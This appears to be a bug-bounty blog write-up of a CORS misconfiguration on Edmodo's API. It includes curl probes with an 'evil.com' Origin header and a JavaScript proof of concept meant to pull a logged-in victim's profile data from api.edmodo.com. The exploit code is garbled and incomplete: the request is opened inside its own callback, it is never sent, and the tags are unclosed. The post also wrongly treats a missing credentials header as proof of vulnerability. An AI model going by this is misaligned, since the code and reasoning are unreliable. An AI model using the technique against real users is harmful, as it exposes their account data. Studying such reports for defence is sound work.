Exploitation of CORS(Cross Origin Resource Sharing) on Edmodo

Hello All,

This is Yeasir Arafat here.While I was penetrating Edmodo I saw a api endpoint is vulnerable to CORS misconfiguration. At first we needed to ensure that, it’s vuln. to cors or not . For ensure the issue we must have set up curl on PC.

Here is curl command: 
curl https://www.edmodo.com -H “Origin: https://evil.com"
200 ok. 
But no Access-Control-Allowed-Credentials: true

That means Edmodo is vulnerable to CORS.

Now checking it’s on api.edmodo.com
 curl https://api.edmodo.com -H “Origin: https://evil.com"
200 ok. 
And here is: Access-Control-Allowed-Credentials: true

That means this sites are vulnerable to CORS.See the below image.

From that api endpoint I got sensitive information.Like ip,email,id,created date,about,etc etc.



For Exploitation I used below code:

<!DOCTYPE html>
<title>CORS PoC Exploit</title>
<h1>CORS Exploit<br>Yeasir Arafat</h1>
<div id=”demo”>
<button type=”button” onclick=”cors()”>Exploit</button>
<script type=”text/javascript”>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if(this.readyState == 4 && this.status == 200) {
document.getElementById(“demo”).innerHTML = this.responseText;
xhttp.open(“GET”, “https://api.edmodo.com/users/id", true);
xhttp.withCredentials = true;

I run this exploit code into my browser. And I can get user information from api.edmodo.com use my localhost or any other free domain or any place.For showing you guys I just run it into my browser.

And now if a logged in user use or hit the exploit button his account information will be exported to me.

Thanks. Yeasir Arafat

Bangladeshi Bug Bounty Hunter